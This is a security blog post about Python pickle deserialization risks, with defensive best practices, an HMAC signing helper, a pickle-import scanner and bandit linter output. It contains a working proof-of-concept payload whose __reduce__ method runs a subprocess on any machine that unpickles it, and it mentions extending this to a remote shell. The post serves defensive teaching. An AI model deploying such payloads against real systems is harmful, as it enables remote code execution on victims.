If you are familiar with Python, you may have used the Pickle standard library module for object serialization. This module allows a developer to convert a Python object into data that can be transferred over the network, written to a file, or even stored away in a database. When the object is later needed, the Pickle module can convert the serialized data into a regular Python object.

When building distributed systems, a data serialization format can be used to communicate between machines. Pickle may look ideal for this because it can serialize almost any Python object, but it has security problems that anyone using it should understand.

Post written by Travis Cunningham, Software Engineer, and Taylor Brazelton, Software Engineer

Python Pickle: Code an Attacker Might Use

In this example, we will use ZeroMQ to send data serialized with Pickle from one Python instance to another.

Client Code (client.py)

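import pickle
import zmq

context = zmq.Context()
sock = context.socket(zmq.PULL)
sock.connect('tcp://127.0.0.1:5555')  # must match the port server.py binds to

message = sock.recv()  # Receive a message
pickle.loads(message)  # Unpickle the data; this calls whatever __reduce__ specified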

Server Code (server.py)

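import pickle
import subprocess
import zmq

context = zmq.Context()
sock = context.socket(zmq.PUSH)
sock.bind('tcp://*:5555')  # port 5555 is an arbitrary choice; client.py must use the same one

class Payload(object):
    """ Executes /bin/ls when unpickled. """
    def __reduce__(self):
        """ Run /bin/ls on the remote machine. """
        # pickle saves this callable and its arguments; the unpickler then
        # calls subprocess.Popen(('/bin/ls',)) on the receiving machine.
        return (subprocess.Popen, (('/bin/ls',),))

# Send the payload over the socket
sock.send(pickle.dumps(Payload()))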

In separate shells, run server.py first and then client.py. The client prints the directory listing produced by /bin/ls:

> python client.py
client.py server.py

As you can see, the client ran /bin/ls, the command returned by Payload.__reduce__(), just by unpickling the message. A more advanced attack would use the same technique to give the attacker remote access to a shell on the target system.
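To see the mechanism without ZeroMQ or a subprocess, here is a minimal local sketch. It swaps the /bin/ls payload for a harmless call to Python's built-in eval(): __reduce__ returns a callable plus its arguments, pickle stores them, and pickle.loads() calls that callable and hands back its result instead of a Payload object.

```python
import pickle


class Payload(object):
    """Harmless stand-in for the attacker's payload."""

    def __reduce__(self):
        # pickle records only this callable (builtins.eval, by name) and its
        # arguments; pickle.loads() will call eval("6 * 7", {}) at load time.
        return (eval, ("6 * 7", {}))


data = pickle.dumps(Payload())  # dumping does NOT call eval
result = pickle.loads(data)     # loading calls eval and returns its result

print(type(result).__name__, result)  # prints: int 42
```

The receiver never gets a Payload back; it gets whatever the named callable returned, which is why the attacker controls what runs.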

There are legitimate reasons to implement __reduce__, though: it gives a class a way to save the state of objects that pickle could not otherwise serialize. However, letting the serialized data dictate how it should be deserialized gives attackers a simple vector for executing arbitrary code.
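As a sketch of a legitimate use, assume a hypothetical Counter class that guards its value with a threading.Lock, which pickle refuses to serialize. Its __reduce__ tells pickle to save only the integer and rebuild the object (and a fresh lock) on load. The same hook that makes this work is the one Payload abuses: pickle trusts whatever callable the data names.

```python
import pickle
import threading


class Counter(object):
    """A counter guarded by a lock; lock objects themselves cannot be pickled."""

    def __init__(self, value=0):
        self.value = value
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self.value += 1

    def __reduce__(self):
        # Save only the plain integer. On unpickling, pickle calls
        # Counter(value), and __init__ creates a fresh lock.
        return (Counter, (self.value,))


original = Counter()
original.increment()
original.increment()

restored = pickle.loads(pickle.dumps(original))
print(restored.value)  # prints: 2
```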

Even if attackers do not control the server, they may have access to the network between the client and the server. In that scenario, they can inject a payload into the communication channel between the two machines.

Python Pickle Security Best Practices

  • If possible, encrypt the network connection between the machines that exchange pickled data. SSL/TLS is common and effective here: it authenticates traffic as well as encrypting it, so an attacker on the network cannot read or modify the pickled data in transit.
  • If network connection encryption is not possible, sign the pickled data with a digital signature and verify the signature before unpickling, so that data altered in transit is rejected.
  • If pickled data is stored on disk, apply strict file permissions so that only trusted users can modify it.
  • Since it is easy to execute arbitrary code when unpickling data, it may be best to avoid using the Pickle module. Avoiding the module will also prevent other developers from introducing security problems into your application. If you need to use a data serialization format, consider using JSON or Google Protocol Buffers.
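One way to apply the signing advice, sketched under the assumption that both machines share a secret key: use an HMAC (a keyed hash from Python's standard hmac module) instead of a public-key digital signature. The sender prefixes each pickle with a tag, and the receiver refuses to call pickle.loads() unless the tag verifies. The names SECRET_KEY, sign_and_pickle and verify_and_unpickle are hypothetical, and the code assumes Python 3.

```python
import hashlib
import hmac
import pickle

# Hypothetical shared secret: load it from secure configuration in practice,
# and never ship it inside the code or the message.
SECRET_KEY = b"replace-with-a-long-random-secret"
TAG_SIZE = hashlib.sha256().digest_size  # 32 bytes


def sign_and_pickle(obj, key=SECRET_KEY):
    """Pickle obj and prefix the bytes with an HMAC-SHA256 tag."""
    data = pickle.dumps(obj)
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return tag + data


def verify_and_unpickle(message, key=SECRET_KEY):
    """Check the tag first; only unpickle data that was signed with key."""
    tag, data = message[:TAG_SIZE], message[TAG_SIZE:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    # compare_digest avoids leaking timing information about the tag.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC check failed; refusing to unpickle")
    return pickle.loads(data)


message = sign_and_pickle({"user": "alice", "id": 7})
print(verify_and_unpickle(message))

# Flip one bit in the pickled bytes to simulate tampering in transit.
tampered = message[:-1] + bytes([message[-1] ^ 1])
try:
    verify_and_unpickle(tampered)
except ValueError as exc:
    print(exc)
```

This only proves the data came from someone holding the key. If the sender or the key is compromised, a signed payload is just as dangerous, so signing complements the other practices rather than replacing them.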

Python Pickle: Security Risk & Alternative

At SmartFile, we use Google Protocol Buffers for communication between software systems and view Python Pickle as a security risk. As a security measure, we disallow usage of the Pickle module in all of our software dependencies.
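For comparison, here is a minimal sketch of a message exchange using the standard json module, one of the alternatives suggested in the best practices list. The message fields and helper names are hypothetical. Unlike pickle.loads(), json.loads() with its default arguments can only build dicts, lists, strings, numbers, booleans and None, so a malicious message can at worst fail validation.

```python
import json


def encode_message(command, args):
    """Serialize a message using only JSON types."""
    return json.dumps({"command": command, "args": args}).encode("utf-8")


def decode_message(raw):
    """Parse and validate a message before trusting any of its fields."""
    message = json.loads(raw.decode("utf-8"))  # raises ValueError on bad JSON
    if not isinstance(message, dict) or set(message) != {"command", "args"}:
        raise ValueError("unexpected message shape")
    if not isinstance(message["command"], str) or not isinstance(message["args"], list):
        raise ValueError("unexpected field types")
    return message


raw = encode_message("list_files", ["/tmp"])
print(decode_message(raw))
```

With pyzmq, these bytes can travel over the same PUSH/PULL sockets via send() and recv(); pyzmq sockets also offer send_json() and recv_json() convenience methods.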

How Can I Find Pickle Usage in My Code?

To check your code base for usage of Pickle, you can use bandit, a security linter from the OpenStack Security Group. It finds common security problems in Python code, including imports and calls of the pickle module. It is also useful to check your project dependencies for usage of Pickle.
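bandit is the more complete tool, but the idea behind its import check is simple enough to sketch with Python's standard ast module. The hypothetical helpers below flag import statements for pickle-family modules and could be pointed at a virtualenv's site-packages directory to check dependencies. They do not detect dynamic imports such as importlib.import_module("pickle"), and they skip files the running interpreter cannot parse.

```python
import ast
import os

# Module names to flag; cPickle is the Python 2 C implementation.
PICKLE_MODULES = {"pickle", "cPickle", "_pickle"}


def find_pickle_imports(source, filename="<string>"):
    """Return sorted (line, module) pairs for each pickle import in source."""
    hits = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        for name in names:
            if name.split(".")[0] in PICKLE_MODULES:
                hits.append((node.lineno, name))
    return sorted(hits)


def scan_directory(root):
    """Yield (path, line, module) for every pickle import in .py files under root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            if not filename.endswith(".py"):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with open(path, encoding="utf-8") as handle:
                    hits = find_pickle_imports(handle.read(), path)
            except (OSError, SyntaxError, ValueError):
                continue  # unreadable, undecodable, or unparsable file
            for line, module in hits:
                yield path, line, module


for path, line, module in scan_directory("."):
    print("%s:%d imports %s" % (path, line, module))
```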

Install Bandit

> pip install bandit

Run Analysis

> bandit -r .
[bandit]	INFO	using config: /home/travis/venv/etc/bandit/bandit.yaml
[bandit]	INFO	running on Python 2.7.10
Run started:
	2015-11-06 22:32:03.032735

Run metrics:
	Total lines of code: 33
	Total lines skipped (#nosec): 0
	Total issues (by severity):
		Undefined: 0
		Low: 4
		Medium: 1
		High: 0
	Total issues (by confidence):
		Undefined: 0
		Low: 0
		Medium: 0
		High: 5

Files skipped (0):

Test results:

>> Issue: [blacklist_imports] Consider possible security implications associated with pickle module.

   Severity: Low   Confidence: High
   Location: ./client.py:1
1	import pickle
2	import zmq

>> Issue: [blacklist_calls] Pickle library appears to be in use, possible security issue.

   Severity: Medium   Confidence: High
   Location: ./client.py:9
8	message= sock.recv()
9	pickle.loads(message)

>> Issue: [blacklist_imports] Consider possible security implications associated with pickle module.

   Severity: Low   Confidence: High
   Location: ./server.py:1
1	import pickle
2	import subprocess
3	import zmq

>> Issue: [blacklist_imports] Consider possible security implications associated with subprocess module.

   Severity: Low   Confidence: High
   Location: ./server.py:2
1	import pickle
2	import subprocess
3	import zmq

Adding bandit to your Continuous Integration service (such as Jenkins or Travis CI) can help prevent team members from introducing potential security problems.


About Travis Cunningham

Software Engineer. Loves community and open source.
